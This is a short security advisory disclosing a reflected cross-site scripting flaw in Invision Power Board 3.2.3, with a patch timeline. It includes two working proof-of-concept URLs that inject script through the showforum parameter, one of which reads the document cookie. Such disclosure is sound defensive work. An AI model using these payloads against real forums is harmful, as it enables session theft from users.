Name :  Cross-site scripting vulnerability in Invision Power Board version 3.2.3
Software :  Invision Power Board version 3.2.3
Vendor Homepage :  http://www.invisionpower.com
Vulnerability Type :  Cross-site scripting
Researcher :  Vasil A. xss@9y.com

Description
--------------------
Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an
Internet forum software produced by Invision Power Services, Inc. It
is written in PHP and primarily uses MySQL as a database management
system, although support for other database engines is available.

Details
--------------------
IP Board is affected by a Cross-site scripting vulnerability in version 3.2.3.

Example PoC url is as follows :

http://example.com/forums/index.php?showforum=53"><script>with(document)alert(cookie)</script>

Additional notes:
1.If a forum contain sub-forums this vulnerability don't exist.

2.Most of boards uses "Friendly Url style",but the attack can be
performed  by using "legacy URL style" in the query,e.g :

http://example.com/forum/index.php?showforum=2"><script>alert(/xss/.source)</script>

instead:

http://example.com/forum/index.php?/forum/2-example/

Solution
--------------------
The vendor issued patch for this vulnerability. Please see the references.

Advisory Timeline
--------------------
10/03/2012 - First contact: Sent the vulnerability details
12/03/2012 - Second contact: Ask for patch
14/03/2012 - Vulnerability Fixed
15/03/2012 - Vulnerability Released

Credits
-------------------
It has been discovered on testing of Netsparker, Web Application
Security Scanner - http://www.mavitunasecurity.com/netsparker/.